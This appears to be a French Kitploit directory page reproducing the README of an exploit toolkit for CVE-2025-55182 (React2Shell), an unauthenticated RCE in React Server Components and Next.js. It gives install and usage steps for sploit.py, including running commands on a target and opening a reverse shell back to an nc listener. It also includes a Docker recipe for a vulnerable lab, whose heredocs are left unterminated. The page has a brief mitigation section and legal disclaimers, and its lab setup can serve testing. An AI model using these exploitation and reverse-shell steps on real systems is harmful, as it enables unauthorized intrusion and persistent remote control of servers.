Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182 — Un kit d'outils simple pour valider, exploiter et obtenir un shell interactif via la RCE react2Shell Next.js. | Kitploit
Outils/GitHubGitHub/j4ck3lsyn-gen2/cve-2025-55182
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubj4ck3lsyn-gen2/cve-2025-55182

CVE-2025-55182

Un kit d'outils simple pour valider, exploiter et obtenir un shell interactif via la RCE react2Shell Next.js.

Voir le dépôt
il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182 : React2Shell - Boîte à outils d'exécution de code à distance pour Next.js

CVE-2025-55182 CVSS License

[!AVERTISSEMENT] Cet outil est fourni uniquement à des fins de tests autorisés et d'éducation. L'accès non autorisé au réseau et l'exfiltration de données sont illégaux. Les utilisateurs sont responsables de s'assurer qu'ils disposent des autorisations appropriées avant d'utiliser cet outil sur un réseau.

Aperçu

Ce dépôt contient une boîte à outils simple pour valider, exploiter (sploit) et obtenir un shell interactif via CVE-2025-55182, également connue sous le nom de React2Shell. Il s'agit d'une vulnérabilité critique d'exécution de code à distance (RCE) sans authentification préalable dans les React Server Components (RSC) affectant les versions 19.0.0, 19.1.0, 19.1.1 et 19.2.0.

La vulnérabilité provient d'une désérialisation non sécurisée dans le protocole Flight de React, permettant à des attaquants non authentifiés d'exécuter du code arbitraire sur les serveurs vulnérables. Elle a été divulguée le 3 décembre 2025 et possède un score CVSS de 10.0 (Critique). Bien qu'elle affecte principalement les React Server Components, elle a des implications pour les frameworks comme Next.js qui utilisent RSC.

Remarque : Cette boîte à outils est destinée uniquement à des fins éducatives et de recherche. L'exploitation non autorisée de vulnérabilités est illégale et contraire à l'éthique. Utilisez-la de manière responsable et uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.

Composants affectés

  • React Server Components : Versions 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Frameworks associés : Next.js (potentiellement via CVE-2025-66478 dans certains contextes)
  • Vecteur d'exploitation : Désérialisation non sécurisée dans les charges utiles RSC, permettant une RCE sans authentification.

Pour plus de détails, consultez les avis officiels :

  • NVD CVE-2025-55182
  • Avis de sécurité React
  • Blog Wiz sur React2Shell

Utilisation


Fonctionnalités

  • Validation : Vérifier si une cible est vulnérable à CVE-2025-55182.
  • Exploitation : Créer des charges utiles pour exécuter des commandes arbitraires.
  • Shell interactif : Obtenir un shell inversé pour un accès persistant.
  • Compatible avec Python 3.x avec des dépendances minimales.

Prérequis

  • Python 3.8+
  • Bibliothèques requises : requests, argparse (installer via pip install -r requirements.txt)

Installation

Installation avec Venv

  1. Clonez le dépôt
root@kitploit:~
git clone https://github.com/J4ck3LSyN-Gen2/CVE-2025-55182.git
cd CVE-2025-55182
  1. Environnement virtuel
root@kitploit:~
python3 -m venv CVE202555182Venv
python3 -m pip install -r requirements.txt
  1. Activez
root@kitploit:~
source CVE202555182Venv/bin/activate[.fish]

Installation locale

  1. Clonez le dépôt :
    root@kitploit:~
    git clone https://github.com/J4ck3LSyN-Gen2/CVE-2025-55182.git
    cd CVE-2025-55182
    
  2. Installez les dépendances :
    root@kitploit:~
    pip install -r requirements.txt
    

Utilisation

Le script principal est sploit.py. Exécutez-le avec les options suivantes :

root@kitploit:~
python sploit.py --help

Options

  • --target <URL> : L'URL cible (ex. http://vulnerable-site.com).
  • --mode <validate|sploit|shell> : Mode d'opération.
    • validate : Vérifier la vulnérabilité sans exploitation.
    • sploit : Exécuter une commande personnalisée.
    • shell : Établir un shell inversé interactif.
  • --command <CMD> : Commande à exécuter (obligatoire pour le mode sploit).
  • --lhost <IP> : Hôte local pour le shell inversé (obligatoire pour le mode shell).
  • --lport <PORT> : Port local pour le shell inversé (par défaut : 4444).

Exemples

  1. Valider la vulnérabilité :

    root@kitploit:~
    python sploit.py --target http://example.com --mode validate
    
  2. Exploiter avec exécution de commande :

    root@kitploit:~
    python sploit.py --target http://example.com --mode sploit --command "whoami"
    
  3. Obtenir un shell interactif : D'abord, mettez en place un écouteur (ex. nc -lvnp 4444), puis :

    root@kitploit:~
    python sploit.py --target http://example.com --mode shell --lhost 192.168.1.100 --lport 4444
    

Comment ça marche

  1. Détection de la vulnérabilité : Envoie une charge utile RSC spécialement conçue pour détecter les failles de désérialisation.
  2. Création de la charge utile : Utilise une désérialisation non sécurisée pour injecter du code via le protocole Flight de React.
  3. Accès shell : Passe à un shell inversé en exécutant une charge utile qui se connecte à la machine de l'attaquant.

Pour des analyses techniques approfondies :

  • Analyse des Datadog Security Labs
  • Blog Dynatrace

Exemple d'exécution


Installation avec Docker

root@kitploit:~

{
  "dependencies": {
    "next": "14.3.0-canary.77",
    "react": "19.0.0",
    "react-dom": "19.0.0"
  },
  "scripts": {
    "dev": "next dev",
    "build": "next build",
    "start": "next start"
  }
}

Supprimez complètement tsconfig.json (c'est la clé qui tuait la construction)

root@kitploit:~

rm tsconfig.json

Créez les fichiers minimaux requis de l'App Router

root@kitploit:~

mkdir -p app

# app/layout.tsx
cat > app/layout.tsx << 'EOF'
import "./globals.css";

export default function RootLayout({
  children,
}: {
  children: React.ReactNode;
}) {
  return (
    <html lang="en">
      <body>{children}</body>
    </html>
  );
}

app/globals.css (peut être pratiquement vide)

root@kitploit:~
echo "/* minimal css - required by Next.js */" > app/globals.css

app/page.tsx (votre vraie page vulnérable va ici – exemple factice)

root@kitploit:~
cat > app/page.tsx << 'EOF'
export default function Home() {
  return (
    <main>
      <h1>react2shell lab is running!</h1>
      <p>Start sploiting → /api/vulnerable-endpoint</p>
    </main>
  );
}

Créez le Dockerfile final et robuste (contenu exact)

root@kitploit:~

FROM node:20-alpine

WORKDIR /app

# Copy only package files first (better caching)
COPY package*.json ./

# Install dependencies with legacy peer deps (required for this old canary)
RUN npm install --legacy-peer-deps

# Copy the rest of the app
COPY . .

# Remove tsconfig.json so Next.js doesn't try to auto-install TypeScript (this was the killer)
RUN rm -f tsconfig.json

# Build the Next.js app
RUN npm run build

# Expose port
EXPOSE 3000

# Start the app
CMD ["npm", "start"]

Construisez et exécutez (ces commandes fonctionnent maintenant parfaitement)

root@kitploit:~

docker build -t react2shell .
docker run -d -p 3000:3000 --name react2shell react2shell

Ouvrir dans le navigateur

→ http://localhost:3000Vous avez terminé. Le conteneur démarre en moins de 2 secondes et est prêt pour les chaînes prototype pollution → RCE.Option en une ligne pour tout détruire et redémarrer à tout moment :bash

root@kitploit:~
docker rm -f react2shell && docker run -d -p 3000:3000 --name react2shell react2shell

Atténuation

  • Mettez à jour React vers la version 19.2.1 ou ultérieure.
  • Désactivez ou restreignez les React Server Components si nécessaire.
  • Surveillez les tentatives d'exploitation, car des acteurs parrainés par des États (par exemple, les groupes liés à la Chine) ont été observés ciblant rapidement cette CVE.

Voir le blog de sécurité AWS pour le renseignement sur les menaces.

Avertissement

Cet outil est fourni "en l'état" sans garantie. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cette boîte à outils. Obtenez toujours une autorisation avant de tester des vulnérabilités.

Contribuer

Les demandes de tirage (pull requests) sont les bienvenues ! Pour des modifications majeures, veuillez d'abord ouvrir une issue.

Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.

Références

  • Avis Cisco
  • Rapport Palo Alto Unit 42
  • Nouvelles CMU ISO
  • Blog Cloudflare
  • Blog Huntress
  • Blog JFrog
  • Elastic Security
Your Image Badge
Télécharger l’outil